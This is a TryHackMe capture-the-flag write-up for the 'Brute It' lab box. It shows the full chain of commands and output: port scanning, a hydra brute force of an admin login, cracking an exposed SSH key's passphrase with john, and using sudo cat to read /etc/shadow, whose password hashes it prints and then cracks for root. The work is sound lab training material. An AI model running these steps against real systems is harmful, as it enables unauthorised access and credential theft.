Brute It WriteUp

This is my write ups for Brute It Room on Try Hack Me.

This room is a CTF type of room

I will try to go deep into the technical thing we do in this room.

---

Task 1 - About this box

info

In this box you will learn about:c

• Brute-force

• Hash cracking

• Privilege escalation

Task 2 - Reconnaissance

• Start with create a nmap folder to store the nmap scans

mkdir nmap

nmap -sC -sV -T4 -v -oN nmap/initial_scan $IP

rustscan -a $IP -- -oN nmap/rustscan

Nmap and Rustscan result

## Nmap initial scan
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

## Rustscan result
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

• Since they have a web running on port 80, we can try some gobuster

Gobuster Scan

gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob_1.log

/admin                (Status: 301) [Size: 312] [--> http://10.10.91.113/admin/]

Task 3 - Getting a shell

• Go over to the http://$IP/admin/ to find the web login page. Try to brute force it with hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.91.113 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid"

[80][http-post-form] host: 10.10.91.113   login: admin   password: [REDACTED]

• Get the rsa private key from http://$IP/admin/panel/id_rsa

Don't forget

Remember to give the id_rsa correct permission of 600

• Crack the id_rsa passphrase with john

John The Ripper

python /usr/share/john/ssh2john.py id_rsa > hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[REDACTED]       (id_rsa)

• SSH into the machine with user john and his id_rsa

ssh -i id_rsa john@$IP

cat user.txt 
THM{REDACTED}

Task 4 - Privilege Escalation

• Looking to see if john can do any sudo action on this box

sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat

• With this we can read the /etc/shadow and /etc/passwd to get root password

sudo cat /etc/shadow

root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::

sudo cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
thm:x:1000:1000:THM Room:/home/thm:/bin/bash
john:x:1001:1001:john,,,:/home/john:/bin/bash

• Put these into 2 files called shadow.txt and pass.txt on our machine then unshadow to crack it

unshadow pass.txt shadow.txt > root.pass

john --wordlist=/usr/share/wordlists/rockyou.txt root.pass
[REDACTED]        (root)

• We now can become root

su root

cat /root/root.txt
THM{REDACTED}